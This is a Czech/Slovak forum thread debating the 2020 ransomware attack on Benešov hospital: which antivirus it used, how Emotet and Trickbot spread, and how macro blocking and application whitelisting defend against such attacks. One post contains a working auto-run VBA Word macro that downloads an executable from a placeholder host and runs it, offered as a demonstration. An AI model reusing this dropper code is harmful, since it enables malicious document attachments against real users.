Přidat otázku mezi oblíbenéZasílat nové odpovědi e-mailem Kyberútok na nemocnici v Benešově

Přečetl jsem si článek https://www.lidovky.cz/domov/ukliknuti-stalo-nemocnici-v-benesove-40-milionu-kyberutok-zacal-kliknutim-na-prilohu.A200115_201359_ln_domov_vlh a nějak se nemůžu dočíst to nejpodstatnější - jakou formu antivirové ochrany v té nemocnici vlastně používali. Osobně tipuji - že žádnou, resp. že krapet dětinsky spoléhali na nástroje integrované ve Windows. Máte někdo v tomto směru nějaké podrobnější informace?

Jsou zobrazeny jen nové odpovědi. Zobrazit všechny
Předmět Autor Datum
Načo ti to je vedieť. Pozri sa na naše novinky, kde su 2 správy o phisingpvyvh útokoch... a to podst…
fleg 16.01.2020 07:19
fleg
To je naprosto zásadní otázka. Protože třeba Eset poskytuje funkční Ransomware štít a kdyby něco tak…
JindraX 16.01.2020 09:39
JindraX
To je bullshit toto. Žádný antivirus není dokonalý, naopak nejspolehlivější mi přijde Defender. Anti… nový
mlok8 19.01.2020 01:12
mlok8
Blbosť, mali iba Eset spolu s americkým, kapitaľistickým Defender, keby používali Avast, sú chránení… nový
Nuda 19.01.2020 08:23
Nuda
aj pomocný zdravotný personál I jejich děti. To nepodceňuj! poslední
IQ37 19.01.2020 14:29
IQ37
"Pozri sa na naše novinky, kde su 2 správy o phisingpvyvh útokoch... a to podstatné... väčšina veľký… nový
kacikac 17.01.2020 15:54
kacikac
Normálny človek nepoužíva antivirus a nechytí ani vírus...
Mlocik97 16.01.2020 11:09
Mlocik97
Správně, normálný člověk zkouší každý den novou verzi Linuxu, takže výrobci virů se nestačí adaptova… nový
jege 18.01.2020 12:42
jege
https://www.hospital-bn.cz/novinky/napadeni-nemocnice-rudolfa-a-stefanie-benesov-krok-po-kroku/ "Nem…
kacikac 16.01.2020 14:16
kacikac
"Nemocnice měla nasazené prvky softwarové ochrany jako je firewall a antivirová ochrana (ESET a Defe…
JindraX 16.01.2020 18:21
JindraX
...Podle mne tam někdo něco těžce zanedbal a teď se to snaží ututlat.... Já bych k tomuto řekl toto…
Yarda 16.01.2020 18:48
Yarda
Už to svedli na Rusy. Zahákovali nemocnici a odvolali Čižinského.
karel 16.01.2020 18:51
karel
se obávám, že mezinárodní hackerské skupiny existovaly jen na počátku století. od té doby, co se z ú… nový
lední brtník 16.01.2020 21:24
lední brtník
Uvedeno je nemocnice, nikde není uvedeno, že ta kombinace byla v jendom OS. Co se týče té doby, já b… nový
kacikac 16.01.2020 18:58
kacikac
jéžiš, ty jsi teda teoretik... :-D nový
touchwood 17.01.2020 14:26
touchwood
Ten příspěvek teoretický byl. Ale jinak, pokud to jde a v rámci možností, jsem i praktik :-) Např. z… nový
kacikac 17.01.2020 15:40
kacikac
Tvá praxe je ovšem z druhé strany a navíc tak trošku lamerská. Nic proti, ale tímhle nikoho neohromí… nový
touchwood 17.01.2020 17:10
touchwood
Já nikoho ohromit nechci :-) Píšu své názory a píšu to co vím, píšu to jako domácí uživatel, který s… nový
kacikac 17.01.2020 17:55
kacikac
Jasně, není problém se vyjadřovat na téma např. operace akutního zánětu slepého střeva, i když nikdo… nový
touchwood 18.01.2020 15:51
touchwood
1) V prosinci odvolaný ředitel NÚKIB: ne IT vzdělání, manažerské pozice. Podle tebe jeho názor co se… nový
kacikac 19.01.2020 01:04
kacikac
Nechci vas tu rozsuzovat, nakonec kdo jsem, abych mohl, ale bod 1) Ano, ten clovek prokazal, ze konk… nový
RedMaX 19.01.2020 09:11
RedMaX
Nikdy jsem neviděl takovou situaci například při použití antiviru Eset. tys to neviděl hodně. až na… nový
lední brtník 16.01.2020 21:46
lední brtník
To by mě taky zajímalo...co používali, verze OS, antivirů, jaké prostředí... pouze Win/Lin/Mac...atd… nový
FixExa 17.01.2020 13:42
FixExa
Senátor Fischer to už vyřešil. Udělali to Rusové a řešení je víc peněz pro NÚKIB. nový
karel 17.01.2020 16:03
karel
Takže když je něco napadeno virem, který vznikl v rusku, udělali to Rusové. Co tedy s těmi nástroji,… nový
Jan Fiala 17.01.2020 16:52
Jan Fiala
Senátor není nejostřejší tužka v penálu, ale politicky mu to myslí. nový
karel 17.01.2020 16:55
karel

Načo ti to je vedieť. Pozri sa na naše novinky, kde su 2 správy o phisingpvyvh útokoch... a to podstatné... väčšina veľkých antivírov ich nevedela ani pár dní po lobjavení detegovat.
OK aby som nekecal... pri policajnom phisingu zareagovali veľké firmy do 48h.

To je naprosto zásadní otázka. Protože třeba Eset poskytuje funkční Ransomware štít a kdyby něco takového používali, rozhodně by nedošlo k plošnému zašifrování souborů. Předpokládám, že tam žádná skutečná ochrana nebyla použita, případně že spoléhali na Microsoft Defender.

To je bullshit toto. Žádný antivirus není dokonalý, naopak nejspolehlivější mi přijde Defender. Antivir by tě správně měl chránit před útokem zvenčí a ne analyzovat každou tvoji chybu a kontrolovat, jestli sis nestáhl virus. Měl by tě chránit, když uděláš chybu, ne když nepoužíváš mozek a nedodržuješ zásady bezpečnosti na internetu.

aj pomocný zdravotný personál

I jejich děti. To nepodceňuj!

"Pozri sa na naše novinky, kde su 2 správy o phisingpvyvh útokoch... a to podstatné... väčšina veľkých antivírov ich nevedela ani pár dní po lobjavení detegovat."

Kdyby jsi pozorně četl tak jsem v té jedné phisingové aktualitě popisoval test toho malwaru a z toho testu vyplývá to, že Defender v měsíc staré verzi databáze detekuje ten soubor, ale v aktuální verzi detekuje až chování makra. To samé platí i pro makro, které jsem uvedl před chvílí níže. Takže to, že nějaký antivir na virustotal nedetekuje soubor ještě neznamená, že nedetekuje samotnou hrozbu, která v tom souboru je, může detekovat až samotné chování, protože například ty makra se dělají tak, aby nešlo poznat co ty makra dělají, a je lepší až detekovat třeba to, když se to pokoušejí dělat (například stažení/uložení + spuštění souboru).

Normálny človek nepoužíva antivirus a nechytí ani vírus...

Správně, normálný člověk zkouší každý den novou verzi Linuxu, takže výrobci virů se nestačí adaptovat a tlačí stejný styl každému, bez ohledu na to, že z pracovního PC budou mít jenom hračku na zabití volného čaSU, jelikož jím na něm nepoběží jejích pracovní programy. :-D

https://www.hospital-bn.cz/novinky/napadeni-nemocnice-rudolfa-a-stefanie-benesov-krok-po-kroku/
"Nemocnice měla nasazené prvky softwarové ochrany jako je firewall a antivirová ochrana (ESET a Defender)."
Dyť to mají na webu ofiko napsané.
Mimochodem kdyby plně využili "nástroje integrované ve Windows" tak by se jim nestalo to, co se jim stalo, asi o možnostech Windows nic nevíš pokud píšeš "krapet dětinsky spoléhali".
... a jdu pokračovat.
Hejtmanka Jaroslava Pokorná Jermanová, citace z mnou uvedeného odkazu:
"Ještě jdou zdůrazňuji, že nemocnice měla bezpečnostní opatření nastavena jako všechny ostatní nemocnice, včetně fakultních."
Citace z odkazu z prvního postu:
"LN To se opravdu stalo jedním kliknutím na přílohu?
Bohužel ano. Takto je tento virus postavený. Je to takový vojenský průzkumník, který se dostane přes skript do všech ostatních počítačů, serverů a zařízení v síti."

"LN Jak pak útok pokračoval?
Virus si z cloudu stáhl druhého pomocníka, který se jmenuje Trickbot. Má za úkol mapovat veškerá hesla. Dostane se až k privilegovaným účtům administrátorů. ..."

Aha, takže kybernetická bezpečnost nemocnic je nastavena tak, že pokud kdokoliv klikne na přílohu, malware napadne celou nemocnici a malware klidně může přijímat a odesílat cokoliv přes internet (to měli ještě štěstí, že je napadl emotet a verze, která neodesílá data domů). :-D tedy spíš :_-(
Co se týče třeba těch hesel, trickbot se k nim dostane třeba pomocí mimikatze, což je open source nástroj:
https://www.cisecurity.org/white-papers/security-primer-trickbot/
https://github.com/gentilkiwi/mimikatz
a bez toho, aby někde nebylo něco uděláno blbě v kybernetické bezpečnosti, se prostě k těm heslům dostat nedá.
Pak tu máme filtrování v mail serveru, nastavení office, nastavení klientského pc, přístup k admin účtům, na servery...
Jako jsem laik, ale podle mě tam muselo být tolik chyb v kybernetické bezpečnosti, že je mi z toho až smutno.
Fakt se bojím jít do jakékoliv nemocnice!

"Nemocnice měla nasazené prvky softwarové ochrany jako je firewall a antivirová ochrana (ESET a Defender)."
Já si doteď myslel, že kombinovat více systémů antivirové ochrany je zásadní chybou, že zde rozhodně neplatí pravidlo "čím víc pruhů, tím víc Adidas".
Ale ještě lepší věc je uvedená úplně na konci:
"Infiltrace virem: není známo, mohlo to být klidně v řádu měsíců před útokem, probíhá analýza NUKIB"
Takže tím chtějí říci, že měli možná několik měsíců zavirovanou síť a nikdo si toho nevšiml?
Podle mne tam někdo něco těžce zanedbal a teď se to snaží ututlat.
A taky bych si rád někde přečetl nějaké vyjádření společnosti Eset, která se chlubí desítkami ocenění a fakt, že jejich systém údajně nezabránil tomuto incidentu může řada stávajících i potenciálních klientů chápat jako velký problém.

...Podle mne tam někdo něco těžce zanedbal a teď se to snaží ututlat....

Já bych k tomuto řekl toto:

"Předpokládáme revizi stávajících analýz, využití validních a aktuálních dat a pochopitelně i realizaci šetření v oblastech a tématech, které dosud monitorovány nebyly, a přesto jsou pro zabezpečení efektivního proinkluzivního prostředí nezbytné."

:-D:-D:-D:beer:

Uvedeno je nemocnice, nikde není uvedeno, že ta kombinace byla v jendom OS.
Co se týče té doby, já bych to tipoval na max. pár dní podle časů, které jsou uvedeny na núkyb jako doby kompromitace u varování před emotetem. Co se týče té doby, mně přijde spíš zarážející, že je vlastně připuštěna teoretická možnost, že by klidně v nemocnici mohl být malware, který si může dělat co chce a to několik měsíců a může být třeba detekovám až v případě, že začne šifrovat data, což je logicky nápadné jednak že to vytěžuje cpu a jednak že nebude přístup k datům, pokud k nim malware nevytvoří přístup. Jenže to už může být jen třešnička na dortu, pokud je malware schopný stáhnout další malware (například emotet stáhne trickbot z internetu a tedy komunikuje ven (dotaz) a dovnitř)) a tedy komunikovat s internetem navíc nepozorovaně a následně malware získá přístup k admin účtům, tak mi z toho logicky vyplývá, že klidně můžou uniknout citlivá data a jestli je to běžný stav nemocnic, tak kdo ví, v kolika z nich teď utíkají citlivá data... Nebo, nedej Bože, mění...

Ten příspěvek teoretický byl. Ale jinak, pokud to jde a v rámci možností, jsem i praktik :-) Např. zkoušel někdo ten doc od Jan Fiala? Já jo. Nebo emoteta? Nebo si udělal někdo svůj demo malware, který se šíří pomocí doc přílohy v mailu?
Tu máš příklad makra do wordu:

Private Sub Document_Open()
    Dim e As Object
    Set e = CreateObject("Microsoft.XMLHTTP")
    e.Open "GET", "http://localhost/m.exe", False
    e.send
    If e.Status = 200 Then
        Set o = CreateObject("ADODB.Stream")
        o.Open
        o.Type = 1
        o.Write e.responseBody
        o.SaveToFile Environ("Temp") & "\m.exe", 2
        o.Close
    End If
    Dim RunM
    RunM = Shell(Environ("Temp") & "\m.exe")
End Sub 

A pak už je to jen o tom tuto funkcionalitu udělat tak, aby ji nezachycoval třeba antivir. Pod m.exe pak může být co chce. A sleduje někdo chování zabezpečení? Já jo. A třeba ransomware (rsa+aes) jsem teoreticky schopen vytvořit taky a i další prvky malwaru, ale to už raději dělat ani nebudu. :-)
Navíc i teoretické znalosti bohatě stačí na to, aby člověk mohl relevantně reagovat :-) Kdo tu ve vlákně zodpověděl otázku tazatele? Já :-)

Já nikoho ohromit nechci :-)
Píšu své názory a píšu to co vím, píšu to jako domácí uživatel, který se o to zajímá. Nepracuju v it a nemám it vzdělání, ale myslím, že mé znalosti it jako laika jsou docela dobré minimálně na to, abych se k určitým věcem mohl vyjadřovat a napsat svůj názor.
Například toto makro jsem tu napsal proto, aby si klidně mohl kdokoliv vyzkoušet na jakém principu to (doc příloha v mailu a automatické spuštění například exe přes makro) funguje. A myslím, že tu chodí normální lidi, kterým se to může hodit, například mně by se to včera hodilo, protože s makry jsem dělal prvně, takže abych to sesmolil, dalo mi to docela zabrat :-D (nejdřív jsem i stahování chtěl dělat přes shell a curl (součást W10), jenže to mi nečekalo, pak jsem nějak řešil sleep nebo wait, to mi nějak nešlo, takže jsem to udělal přes CreateObject a XMLHTTP, ten čeká než se provede).
A jestli to z druhé strany myslíš z pohledu malware, tak jsem ti tu už psal myslím několikrát (jak jsme to řešili v prosinci), že ten pohled ti jaksi chybí a bez toho, abys ten pohled měl, jaksi nemůžeš řešit kybernetickou bezpečnost.
To, že neohromuju já, je logické. Zdá se mi ale, že neohromuješ ani ty a jestli děláš v it, to bys asi ohromovat měl...

Jasně, není problém se vyjadřovat na téma např. operace akutního zánětu slepého střeva, i když nikdo z nás není doktor. :-) Ale takový "názor" je z logiky věci poměrně bezcenný.

Samozřejmě můžeš napsat stovky různých variant jak stáhnout a spustit kód z internetu, klidně např. pomocí samotného systému (BITS), ale to nikterak neřeší problém velkých organizací, ve kterých pracují vysoká procenta nevzdělaných nebo vystresovaných a přepracovaných lidí, kteří nebudou při klikání přemýšlet. Ty to vidíš z pohledu technokrata, který si nepřipouští fakt, že lidi chybují a při repetitivní práci nepřemýšlí. A to je ta největší chyba, jakou děláš.

Ten zbytek tvého slohového cvičení jen ukazuje, že o reálné praxi víš prd.

1) V prosinci odvolaný ředitel NÚKIB: ne IT vzdělání, manažerské pozice. Podle tebe jeho názor co se týče kybernetické bezpečnosti byl, je a bude bezcenný, ano? Mimochodem jsem chodil na stejnou fakultu jako on.

2) Co řeší problém jsem tu už psal. Snažil jsem se ti jej vysvětlit několik dní, nepochopil jsi a snažit se ho chápat ani nechceš. To chceš abych v tom opět zbytečně pokračoval??? Takže další pokus:
a) Jací jsou koncoví uživatelé vím a názor na ně jsem ti už psal. Proč mi tedy ohledně nich píšeš co mi píšeš??? Já vím, že co se týče kybernetické bezpečnosti chybují a chybovat budou.
b) Určitá firma/organizace vyžaduje určitý stupeň kybernetické bezpečnosti v závislosti na druhu určení. V případě nemocnice musí být kybernetická bezpečnost na relativně vysoké úrovni.
c) O to, aby byla zajištěna kybernetická bezpečnost, se stará kompetentní IT oddělení.
d) Aby byla zajištěna odpovídající kybernetická bezpečnost nemocnice musí být aplikována určitá controls/doporučení. Budu citovat například dvě doporučení uvedená v
http://www.mzcr.cz/dokumenty/pokyn-ministerstva-zdravotnictvi-ve-veci-kyberneticke-hrozby_18235_1.html
která by podle mě aplikovaná určitě být měla:
"Zakažte makro skripty ze souborů sady Office přenášených e-mailem." Psal jsem ti i další možnost a to povolit jen podepsaná makra.
"Implementujte zásady softwarového omezení (Group Policy) nebo jiné ovládací prvky" Takže SRP, AppLocker. Ani whitelisting by nemusel být problém...
Kdyby to nebylo v silách nemocnic to aplikovat asi by to v doporučeních ministerstva zdravotnictví nebylo.
V doporučeních pro administrátory od núkib jsou tyto dvě doporučení uvedena pod "Ověřujte identitu aplikací a souborů" a "hardening konfigurace uživatelských aplikací".
A to jsou jen dvě z mnoha překážek, které by měly být pro malware. Co by se stalo teď? Koncoví uživatel klikne na přílohu s malwarem a příloha se mu zobrazí bez makra (protože je makro zakázané nebo povolené jen podepsané) a nestane se vůbec nic. Co když se bude chtít spustit skript, exe, dll...? Nestane se vůbec nic, protože je vhodně nastavené filtrování aplikací.

3) Obecně od it technika mimo jiné očekávám it vědomosti, zájem o problematiku, zájem o kybernetickou bezpečnost, zájem o problematiku malwaru, přístup ve stylu "není problém"... podobně jako to cítím třeba v případě Martin Hallera (patron-it) doporučuju jeho články a videa, moc zajímavé. Co se týče kybernetické bezpečnosti tak informací na netu je spousta. I to jak řešit kybernetickou bezpečnost firem/organizací.

Nikdy jsem neviděl takovou situaci například při použití antiviru Eset.

tys to neviděl hodně.
až na módní ransomware jsou viry dávno out. antiviry jsou poněkud slabé proti spyware, a samozřejmě nedetekují nové varianty snadno modifikovatelných skriptů.
spoléhat na zabezpečení antivirem je silně naivní.

čili ten nový skript si tam ta skupina propašuje a dokud se neprojeví a není důvod po něm jít, může se jím sestavený proces/služba bavit čím uzná za vhodné, av firmy o něm stále neví.
když se mu daří komunikovat s internetem a může si stahovat další součásti, tehdy chystá v síti "den d" (obvykle úmyslně "noc víkend"). sbírá si informace o verzi os a možnostech k napadení. když se k jejich stažení nedostane, prostě se další level neprojeví, nanejvýš je občas v síti detekován některý z jeho klonů.

doporučuju zůstat u servisu domácích pécéček, toto vypadá že není tvůj hlavní obor.

Takže když je něco napadeno virem, který vznikl v rusku, udělali to Rusové. Co tedy s těmi nástroji, které unikly Američanům a které se hojně využívají? Pak za čímkoliv, co použije nějaký nastroj mohou Američani. To je logika hodná Fishera.
Za odvolání Cizkovskeho taky může Rusko, veřejně to přece prohlásil vrchní člen námořního komanda.

Zpět do poradny Odpovědět na původní otázku Nahoru